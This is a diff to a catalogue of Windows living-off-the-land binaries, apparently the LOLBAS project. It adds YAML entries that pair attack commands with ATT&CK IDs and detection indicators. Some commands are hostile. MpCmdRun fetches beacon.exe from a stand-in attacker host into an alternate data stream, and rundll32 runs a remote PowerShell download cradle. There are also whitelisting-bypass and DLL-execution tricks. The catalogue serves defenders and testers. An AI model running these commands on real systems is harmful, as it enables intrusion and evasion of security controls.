+  - Path: c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\
+  - Path: c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\
+  - Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\
+  - Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
+  - Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
+Detection: 
+  - IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.
+Resources:
+  - Link: https://www.sothis.tech/author/jgalvez/
+Acknowledgement:
+  - Person: Jesus Galvez
+    Handle:
+---
--- a/yml/OSBinaries/Ilasm.yml
+++ b/yml/OSBinaries/Ilasm.yml
@ -0,0 +1,34 @@
+---
+Name: Ilasm.exe
+Description: used for compile c# code into dll or exe.
+Author: Hai vaknin (lux)
+Created: 17/03/2020
+Commands:
+  - Command: ilasm.exe C:\public\test.txt /exe
+    Description: Binary file used by .NET to compile c# code to .exe
+    Usecase: Compile attacker code on system. Bypass defensive counter measures.
+    Category: Compile
+    Privileges: User
+    MitreID: T1127
+    MitreLink: https://attack.mitre.org/techniques/T1127/
+    OperatingSystem: Windows 10,7 
+  - Command: ilasm.exe C:\public\test.txt /dll
+    Description: Binary file used by .NET to compile c# code to dll
+    Usecase: A description of the usecase
+    Category: Compile
+    Privileges: User
+    MitreID: T1127
+    MitreLink: https://attack.mitre.org/techniques/T1127/
+Full_Path:
+  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
+  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
+Code_Sample: 
+- Code:
+Resources:
+  - Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
+Acknowledgement:
+  - Person: Hai Vaknin(Lux)
+    Handle: '@VakninHai'
+  - Person: Lior Adar
+    Handle:
+---
--- a/yml/OSBinaries/MpCmdRun.yml
+++ b/yml/OSBinaries/MpCmdRun.yml
@ -0,0 +1,57 @@
+---
+Name: MpCmdRun.exe
+Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
+Author: 'Oddvar Moe'
+Created: '09/03/2020'
+Commands:
+  - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
+    Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
+    Usecase: Download file
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows 10
+  - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe
+    Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
+    Usecase: Download file
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows 10
+  - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe
+    Description: Download file to machine and store it in Alternate Data Stream
+    Usecase: Hide downloaded data inton an Alternate Data Stream
+    Category: ADS
+    Privileges: User
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
+  - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
+  - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
+Code_Sample: 
+  - Code: 
+Detection: 
+  - IOC: MpCmdRun storing data into alternate data streams.
+  - IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
+  - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
+  - IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log
+  - IOC: User Agent is "MpCommunication"
+Resources:
+  - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus
+  - Link: https://twitter.com/mohammadaskar2/status/1301263551638761477
+  - Link: https://twitter.com/Oddvarmoe/status/1301444858910052352
+  - Link: https://twitter.com/NotMedic/status/1301506813242867720
+Acknowledgement:
+  - Person: Askar
+    Handle: '@mohammadaskar2'
+  - Person: Oddvar Moe
+    Handle: '@oddvarmoe'
+  - Person: RichRumble
+    Handle: ''
+  - Person: Cedric
+    Handle: '@th3c3dr1c'
+---
--- a/yml/OSBinaries/Netsh.yml
+++ b/yml/OSBinaries/Netsh.yml
@ -0,0 +1,35 @@
+---
+Name: Netsh.exe
+Description: Netsh is a Windows tool used to manipulate network interface settings.
+Author: 'Freddie Barr-Smith'
+Created: '2019-12-24'
+Commands:
+  - Command: netsh.exe add helper C:\Users\User\file.dll
+    Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
+    Usecase: Proxy execution of .dll
+    Category: Execute
+    Privileges: User
+    MitreID: T1128
+    MitreLink: https://attack.mitre.org/techniques/T1128/
+    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+Full_Path:
+  - Path: C:\WINDOWS\System32\Netsh.exe
+  - Path: C:\WINDOWS\SysWOW64\Netsh.exe
+Code_Sample: 
+  - Code:
+Detection:
+  - IOC: Netsh initiating a network connection
+Resources:
+  - Link: https://freddiebarrsmith.com/trix/trix.html
+  - Link: https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html
+  - Link: https://liberty-shell.com/sec/2018/07/28/netshlep/
+Acknowledgement:
+  - Person: 'Freddie Barr-Smith'
+    Handle:
+  - Person: 'Riccardo Spolaor'
+    Handle:
+  - Person: 'Mariano Graziano'
+    Handle:
+  - Person: 'Xabier Ugarte-Pedrero'
+    Handle:
+---
--- a/yml/OSBinaries/Pktmon.yml
+++ b/yml/OSBinaries/Pktmon.yml
@ -0,0 +1,35 @@
+---
+Name: Pktmon.exe
+Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
+Author: 'Derek Johnson'
+Created: '2020-08-12'
+Commands:
+  - Command: pktmon.exe start --etw
+    Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop
+    Usecase: use this a built in network sniffer on windows 10 to capture senstive traffic
+    Category: Reconnaissance
+    Privileges: Administrator
+    MitreID: T1040
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1040
+    OperatingSystem: Windows 10 1809 and later
+  - Command: pktmon.exe filter add -p 445
+    Description: Select Desired ports for packet capture
+    Usecase: Look for interesting traffic such as telent or FTP
+    Category: Reconnaissance
+    Privileges: Administrator
+    MitreID: T1040
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1040
+    OperatingSystem: Windows 10 1809 and later
+Full_Path:
+  - Path: c:\windows\system32\pktmon.exe
+  - Path: c:\windows\syswow64\pktmon.exe
+Code_Sample: 
+  - Code:
+Detection: 
+  - IOC: .etl files found on system
+Resources:
+  - Link: https://binar-x79.com/windows-10-secret-sniffer/
+Acknowledgement:
+  - Person: Derek Johnson
+    Handle: ''
+---
--- a/yml/OSBinaries/Psr.yml
+++ b/yml/OSBinaries/Psr.yml
@ -0,0 +1,28 @@
+---
+Name: Psr.exe
+Description: Windows Problem Steps Recorder, used to record screen and clicks.
+Author: Leon Rodenko
+Created: '2020-06-27'
+Commands:
+  - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
+    Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
+    Usecase: Can be used to take screenshots of the user environment
+    Category: Reconnaissance
+    Privileges: User
+    MitreID: T1113
+    MitreLink: https://attack.mitre.org/techniques/T1113/
+    OperatingSystem: since Windows 7 (client) / Windows 2008 R2
+Full_Path:
+  - Path: c:\windows\system32\psr.exe
+  - Path: c:\windows\syswow64\psr.exe
+Code_Sample: 
+  - Code: 
+Detection: 
+  - IOC: psr.exe spawned
+  - IOC: suspicious activity when running with "/gui 0" flag
+Resources:
+  - Link: https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx
+Acknowledgement:
+  - Person: Leon Rodenko
+    Handle: '@L3m0nada'
+---
--- a/yml/OSBinaries/Rasautou.yml
+++ b/yml/OSBinaries/Rasautou.yml
@ -0,0 +1,27 @@
+---
+Name: Rasautou.exe
+Description: Windows Remote Access Dialer
+Author: 'Tony Lambert'
+Created: '2020-01-10'
+Commands:
+  - Command: rasautou -d powershell.dll -p powershell -a a -e e 
+    Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
+    Usecase: Execute DLL code
+    Category: Execute
+    Privileges: User, Administrator in Windows 8
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
+Full_Path:
+  - Path: C:\Windows\System32\rasautou.exe
+Code_Sample: 
+- Code:
+Detection:
+ - IOC: rasautou.exe command line containing -d and -p
+Resources:
+  - Link: https://github.com/fireeye/DueDLLigence
+  - Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
+Acknowledgement:
+  - Person: FireEye
+    Handle: '@FireEye'
+---
--- a/yml/OSBinaries/Regasm.yml
+++ b/yml/OSBinaries/Regasm.yml
@ -8,12 +8,12 @@ Commands:
    Description: Loads the target .DLL file and executes the RegisterClass function.
    Usecase: Execute code and bypass Application whitelisting
    Category: AWL bypass
-    Privileges: User
+    Privileges: Local Admin
    MitreID: T1121
    MitreLink: https://attack.mitre.org/wiki/Technique/T1121
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-  - Command: regasm.exe AllTheThingsx64.dll 
-    Description: Loads the target .DLL file and executes the RegisterClass function.
+  - Command: regasm.exe /U AllTheThingsx64.dll 
+    Description: Loads the target .DLL file and executes the UnRegisterClass function.
    Usecase: Execute code and bypass Application whitelisting
    Category: Execute
    Privileges: User
--- a/yml/OSBinaries/Regini.yml
+++ b/yml/OSBinaries/Regini.yml
@ -0,0 +1,27 @@
+---
+Name: Regini.exe
+Description: Used to manipulate the registry
+Author: 'Oddvar Moe'
+Created: '2020-07-03'
+Commands:
+  - Command: regini.exe newfile.txt:hidden.ini
+    Description: Write registry keys from data inside the Alternate data stream.
+    Usecase: Write to registry
+    Category: ADS
+    Privileges: User
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+Full_Path:
+  - Path: C:\Windows\System32\regini.exe
+  - Path: C:\Windows\SysWOW64\regini.exe
+Code_Sample: 
+- Code:
+Detection:
+ - IOC: regini.exe reading from ADS
+Resources:
+  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+Acknowledgement:
+  - Person: Eli Salem
+    Handle: '@elisalem9'
+---
--- a/yml/OSBinaries/Regsvcs.yml
+++ b/yml/OSBinaries/Regsvcs.yml
@ -8,7 +8,7 @@ Commands:
    Description: Loads the target .DLL file and executes the RegisterClass function.
    Usecase: Execute dll file and bypass Application whitelisting
    Category: Execute
-    Privileges: User
+    Privileges: Local Admin
    MitreID: T1121
    MitreLink: https://attack.mitre.org/wiki/Technique/T1121
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -16,7 +16,7 @@ Commands:
    Description: Loads the target .DLL file and executes the RegisterClass function.
    Usecase: Execute dll file and bypass Application whitelisting
    Category: AWL bypass
-    Privileges: User
+    Privileges: Local Admin
    MitreID: T1121
    MitreLink: https://attack.mitre.org/wiki/Technique/T1121
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@ -12,6 +12,14 @@ Commands:
    MitreID: T1085
    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
+    Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
+    Usecase: Execute DLL from SMB share.
+    Category: Execute
+    Privileges: User
+    MitreID: T1085
+    MitreLink: https://attack.mitre.org/techniques/T1085
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
    Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
    Usecase: Execute code from Internet
@ -73,6 +81,8 @@ Resources:
  - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
  - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
  - Link: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
+  - Link: https://github.com/sailay1996/expl-bin/blob/master/obfus.md
+  - Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
@ -80,4 +90,8 @@ Acknowledgement:
    Handle: '@oddvarmoe'
  - Person: Jimmy
    Handle: '@bohops'
+  - Person: Sailay
+    Handle: '@404death'
+  - Person: Martin Ingesen
+    Handle: '@Mrtn9'
 ---
--- a/yml/OSBinaries/Ttdinject.yml
+++ b/yml/OSBinaries/Ttdinject.yml
@ -0,0 +1,38 @@
+---
+Name: Ttdinject.exe
+Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
+Author: 'Maxime Nadeau'
+Created: '2020-05-12'
+Commands:
+  - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"
+    Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
+    Usecase: Spawn process using other binary
+    Category: Execute
+    Privileges: Administrator
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows 10 2004
+  - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
+    Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
+    Usecase: Spawn process using other binary
+    Category: Execute
+    Privileges: Administrator
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows 10 1909
+Full_Path:
+  - Path: C:\Windows\System32\ttdinject.exe
+  - Path: C:\Windows\Syswow64\ttdinject.exe
+Code_Sample: 
+  - Code: 
+Detection: 
+  - IOC: Parent child relationship. Ttdinject.exe parent for executed command
+  - IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process
+Resources:
+  - Link: https://twitter.com/Oddvarmoe/status/1196333160470138880
+Acknowledgement:
+  - Person: Oddvar Moe
+    Handle: '@oddvarmoe'
+  - Person: Maxime Nadeau
+    Handle: '@m_nad0'
+---
--- a/yml/OSBinaries/Vbc.yml
+++ b/yml/OSBinaries/Vbc.yml
@ -0,0 +1,33 @@
+---
+Name: vbc.exe
+Description: Binary file used for compile vbs code
+Author: Lior Adar
+Created: 27/02/2020
+Commands:
+  - Command: vbc.exe /target:exe c:\temp\vbs\run.vb
+    Description: Binary file used by .NET to compile vb code to .exe
+    Usecase: Compile attacker code on system. Bypass defensive counter measures.
+    Category: Compile
+    Privileges: User
+    MitreID: T1127
+    MitreLink: https://attack.mitre.org/techniques/T1127/
+    OperatingSystem: Windows 10,7 
+  - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
+    Description: Description of the second command
+    Usecase: A description of the usecase
+    Category: Compile
+    Privileges: User
+    MitreID: T1127
+    MitreLink: https://attack.mitre.org/techniques/T1127/
+    OperatingSystem: Windows 10,7 
+Full_Path:
+  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
+  - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
+Code_Sample: 
+- Code:
+Acknowledgement:
+  - Person: Lior Adar
+    Handle:
+  - Person: Hai Vaknin(Lux)
+    Handle:
+---
--- a/yml/OSBinaries/Wuauclt.yml
+++ b/yml/OSBinaries/Wuauclt.yml
@ -0,0 +1,26 @@
+---
+Name: wuauclt.exe
+Description: Windows Update Client
+Author: 'David Middlehurst'
+Created: '2020-09-23'
+Commands:
+  - Command: wuauclt.exe /UpdateDeploymentProvider <Full_Path_To_DLL> /RunHandlerComServer
+    Description: Full_Path_To_DLL would be the abosolute path to .DLL file and would execute code on attach.
+    Usecase: Execute dll via attach/detach methods
+    Category: Execute
+    Privileges: User
+    MitreID: T1085
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1085
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: C:\Windows\System32\wuauclt.exe
+Code_Sample: 
+- Code:
+Detection:
+ - IOC: wuauclt run with a parameter of a DLL path
+Resources:
+  - Link: https://dtm.uk/wuauclt/
+Acknowledgement:
+  - Person: David Middlehurst
+    Handle: '@dtmsecurity'
+---
--- a/yml/OSBinaries/Xwizard.yml
+++ b/yml/OSBinaries/Xwizard.yml
@ -20,6 +20,14 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
+    Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.
+    Usecase: Download file from Internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows 10
 Full_Path:
  - Path: C:\Windows\System32\xwizard.exe
  - Path: C:\Windows\SysWOW64\xwizard.exe
@ -32,6 +40,7 @@ Resources:
  - Link: https://www.youtube.com/watch?v=LwDHX7DVHWU
  - Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
  - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
+  - Link: https://twitter.com/notwhickey/status/1306023056847110144
 Acknowledgement:
  - Person: Adam
    Handle: '@Hexacorn'
@ -39,4 +48,6 @@ Acknowledgement:
    Handle: '@NickTyrer'
  - Person: harr0ey
    Handle: '@harr0ey'
+  - Person: Wade Hickey
+    Handle: '@notwhickey'
 ---
--- a/yml/OSScripts/CL_mutexverifiers.yml
+++ b/yml/OSScripts/CL_mutexverifiers.yml
@ -16,6 +16,8 @@ Full_Path:
  - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
  - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
  - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
+  - Path: C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1
+  - Path: C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1
 Code_Sample: 
  - Code:
 Detection:
--- a/yml/OSScripts/Manage-bde.yml
+++ b/yml/OSScripts/Manage-bde.yml
@ -29,9 +29,12 @@ Detection:
 Resources:
  - Link: https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
  - Link: https://twitter.com/bohops/status/980659399495741441
+  - Link: https://twitter.com/JohnLaTwC/status/1223292479270600706
 Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'
  - Person: Daniel Bohannon
    Handle: '@danielbohannon'
+  - Person: John Lambert
+    Handle: '@JohnLaTwC'
 ---
--- a/yml/OSScripts/Slmgr.yml
+++ b/yml/OSScripts/Slmgr.yml
@ -1,31 +0,0 @@
---
-Name: Slmgr.vbs
-Description: Script used to manage windows license activation
-Author: 'Oddvar Moe'
-Created: '2018-05-25'
-Commands:
-  - Command: reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs
-    Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code
-    Usecase: Proxy execution
-    Category: Execute
-    Privileges: User
-    MitreID: T1216
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
-    OperatingSystem: Windows 10
-Full_Path:
-  - Path: C:\Windows\System32\slmgr.vbs
-  - Path: C:\Windows\SysWOW64\slmgr.vbs
-Code_Sample: 
-  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
-  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
-Detection:
-  - IOC:
-Resources:
-  - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
-  - Link: https://www.youtube.com/watch?v=3gz1QmiMhss
-Acknowledgement:
-  - Person: Matt Nelson
-    Handle: '@enigma0x3'
-  - Person: Casey Smith
-    Handle: '@subtee'
---
--- a/yml/OSScripts/Winrm.yml
+++ b/yml/OSScripts/Winrm.yml
@ -4,14 +4,6 @@ Description: Script used for manage Windows RM settings
 Author: 'Oddvar Moe'
 Created: '2018-05-25'
 Commands:
-  - Command: reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig
-    Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
-    Usecase: Proxy execution
-    Category: Execute
-    Privileges: User
-    MitreID: T1216
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
-    OperatingSystem: Windows 10
  - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985'
    Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol
    Usecase: Proxy execution
--- a/yml/OtherMSBinaries/Agentexecutor.yml
+++ b/yml/OtherMSBinaries/Agentexecutor.yml
@ -0,0 +1,34 @@
+---
+Name: AgentExecutor.exe
+Description: Intune Management Extension included on Intune Managed Devices
+Author: 'Eleftherios Panos'
+Created: '23/07/2020'
+Commands:
+  - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1
+    Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument
+    Usecase: Execute unsigned powershell scripts
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows 10
+  - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
+    Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
+    Usecase: Execute a provided EXE
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: C:\Program Files (x86)\Microsoft Intune Management Extension
+Code_Sample: 
+  - Code:
+Detection: 
+  - IOC:
+Resources:
+  - Link: 
+Acknowledgement:
+  - Person: Eleftherios Panos
+    Handle: '@lefterispan'
+---
--- a/yml/OtherMSBinaries/Coregen.yml
+++ b/yml/OtherMSBinaries/Coregen.yml
@ -0,0 +1,52 @@
+---
+Name: coregen.exe
+Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregen is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.
+Author: Martin Sohn Christensen
+Created: 2020-10-09
+Commands:
+  - Command: coregon.exe.exe /L C:\folder\evil.dll dummy_assembly_name
+    Description: Loads the target .DLL in arbitrary path specified with /L.
+    Usecase: Execute DLL code
+    Category: Execute
+    Privileges: User
+    MitreID: T1055
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1055
+    OperatingSystem: Windows
+  - Command: coregen.exe dummy_assembly_name
+    Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0).
+    Usecase: Execute DLL code
+    Category: Execute
+    Privileges: User
+    MitreID: T1055
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1055
+    OperatingSystem: Windows
+  - Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name
+    Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.
+    Usecase: Execute DLL code
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
+Full_Path:
+  - Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
+  - Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
+Code_Sample: 
+  - Code: 
+Detection:
+  - IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\"
+  - IOC: coregen.exe loading .dll file not named coreclr.dll
+  - IOC: coregen.exe command line containing -L or -l
+  - IOC: coregen.exe command line containing unexpected/invald assembly name
+  - IOC: coregen.exe application crash by invalid assembly name
+Resources:
+  - Link: https://www.youtube.com/watch?v=75XImxOOInU
+  - Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
+Acknowledgement:
+  - Person: Nicky Tyrer
+    Handle: 
+  - Person: Evan Pena
+    Handle: 
+  - Person: Casey Erikson
+    Handle: 
+---
--- a/yml/OtherMSBinaries/DefaultPack.yml
+++ b/yml/OtherMSBinaries/DefaultPack.yml
@ -0,0 +1,26 @@
+---
+Name: DefaultPack.EXE
+Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.
+Author: '@checkymander'
+Created: '2020-10-01'
+Commands:
+  - Command: DefaultPack.EXE /C:"process.exe args"
+    Description: Use DefaultPack.EXE to execute arbitrary binaries, with added argument support.
+    Usecase: Can be used to execute stagers, binaries, and other malicious commands.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows
+Full_Path:
+  - Path: C:\Program Files (x86)\Microsoft\DefaultPack\
+Code_Sample: 
+  - Code:
+Detection: 
+  - IOC: DefaultPack.EXE spawned an unknown process
+Resources:
+  - Link: https://twitter.com/checkymander/status/1311509470275604480.
+Acknowledgement:
+  - Person: checkymander
+    Handle: '@checkymander'
+---
--- a/yml/OtherMSBinaries/Dotnet.yml
+++ b/yml/OtherMSBinaries/Dotnet.yml
@ -0,0 +1,42 @@
+---
+Name: Dotnet.exe
+Description: dotnet.exe comes with .NET Framework
+Author: 'felamos'
+Created: '2019-11-12'
+Commands:
+  - Command: dotnet.exe [PATH_TO_DLL]
+    Description: dotnet.exe will execute any dll even if applocker is enabled.
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows 7 and up with .NET installed
+  - Command: dotnet.exe [PATH_TO_DLL]
+    Description: dotnet.exe will execute any DLL.
+    Usecase: Execute DLL
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows 7 and up with .NET installed
+  - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
+    Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
+    Category: AWL Bypass
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows 10 with .NET Core installed
+Full_Path:
+  - Path: 'C:\Program Files\dotnet\dotnet.exe'
+Detection: 
+  - IOC: dotnet.exe spawned an unknown process
+Resources:
+  - Link: https://twitter.com/_felamos/status/1204705548668555264
+  - Link: https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc
+  - Link: https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/
+Acknowledgement:
+  - Person: felamos
+    Handle: '@_felamos'
+  - Person: Jimmy
+    Handle: '@bohops'  
+---
--- a/yml/OtherMSBinaries/Ntdsutil.yml
+++ b/yml/OtherMSBinaries/Ntdsutil.yml
@ -0,0 +1,26 @@
+---
+Name: ntdsutil.exe
+Description: Command line utility used to export Actove Directory.
+Author: 'Tony Lambert'
+Created: '2020-01-10'
+Commands:
